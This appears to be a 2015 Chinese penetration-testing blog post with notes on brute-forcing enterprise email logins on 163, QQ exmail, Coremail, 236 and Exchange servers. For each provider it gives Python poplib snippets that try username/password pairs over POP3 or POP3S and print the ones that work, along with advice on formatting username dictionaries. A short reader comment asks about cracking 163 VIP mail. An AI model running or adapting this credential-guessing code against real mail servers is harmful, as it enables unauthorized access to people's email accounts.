整理的各种企业邮箱爆破注意点


Jun 12 2015

整理的各种企业邮箱爆破注意点

首页 » 渗透测试 » 整理的各种企业邮箱爆破注意点   

爆破过很多类型的企业邮箱,大体都是差不多的,有一些注意的点贴出来、

163 企业邮箱,关键代码:

server = "pop.qiye.163.com"
pop = poplib.POP3(server,110)
pop.user(user)
auth = pop.pass_(passwd)
if auth.split(' ')[0]== "+OK":
    pring user,passwd

用户字典文件需要@domain.com,类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样。

QQ企业邮箱,关键代码:
server = "pop.exmail.qq.com"
pop = poplib.POP3_SSL(server,995)
pop.user(user)
auth = pop.pass_(passwd)
if auth =="+OK":
    print user,passwd

用户字典文件需要@domain.com,类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样。

Coremail,关键代码:
server = "mail.domain.com"
pop = poplib.POP3_SSL(server,995)
pop.user(user)
auth = pop.pass_(passwd)
if auth =="+OK":
    print user,passwd

用户字典不需要域名后缀,类似zhangsan、lisi、wangwu这样。
236邮箱,关键代码:
server = "mail.domain.com"
pop = poplib.POP3(server,110)
pop.user(user)
auth = pop.pass_(passwd)
if auth.split(' ')[0]== "+OK":
    print user,passwd

用户字典文件需要@domain.com,类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样。

自己搭建的exchange邮箱,关键代码:
server = "mail.domain.com"
pop = poplib.POP3_SSL(server,995)
pop.user(user)
auth = pop.pass_(passwd)
if auth.split(' ')[0]== "+OK":
    print user,passwd

用户字典不需要域名后缀,类似zhangsan、lisi、wangwu这样。

关键区别是几种邮箱登录成功回显略有不同,比如exchange跟QQ企业邮箱就是不同的;
是以poplib模块举例的,可以使用python的imaplib来支持imap协议;

根据邮箱服务器开放的pop3或pop3s端口来调整使用poplib.POP3()方法还是poplib.POP3_

her0ma


如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «163|tencent|236|coremail|exchange企业邮箱通用爆破脚本 | postgres注入总结»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

已有2条评论

匿名

2017-11-15 15:05 沙发
163的vip邮箱能不能爆破掉?

mOon

2017-11-17 16:31
@匿名:屏蔽ip